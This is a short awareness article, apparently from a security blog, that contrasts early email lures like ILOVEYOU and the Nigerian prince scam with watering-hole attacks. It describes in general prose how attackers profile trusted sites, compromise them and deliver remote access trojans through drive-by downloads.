20 years ago cybercriminals only used a few techniques to lure in potential victims. One was sending an email with the subject line of “ILOVEYOU” which contained an attachment that was a virus/worm which infected the user’s machine.  The second was sending messages sent from from a Nigerian prince, who offers a share of a huge investment opportunity and then asks for your bank account number so they can transfer the money to you for safekeeping –  for a small advance payment to cover the transfer expense.

Over the past two decades Cybercriminals have gotten very sophisticated in their tactics. One methodology targets specific individuals in an organization to unknowingly allow the criminal to gain access to the organization’s computer network. The tactic called the “watering hole” attacks an organization by compromising a web site that the target would generally trust – a watering hole.

To be able to identify a watering hole to bait the criminal first needs to deploy any number of commonly used tracking tools, like KISSmetrics or AddThis, to see which web sites are being accessed by the employees of an organization. This gives the criminal a map of the sites for them to target vulnerable sites for infiltration, those which don’t have strict security. The criminal then plants malicious code on the watering hole site and simply waits for users to revisit the site(s).

Once users begin visiting the watering hole their device is scanned to look for known security vulnerabilities. Any device identified as having a vulnerability the criminal uses the “drive-by” downloading technique, meaning the criminal doesn’t even need to have the visitor click on a link or download any files. Instead, malicious code like Remote Access Trojan (RAT) is downloaded in the background. When the code is run it scans for additional vulnerabilities with an exploit code deployed that carries out the real intended network attack is delivered an executed.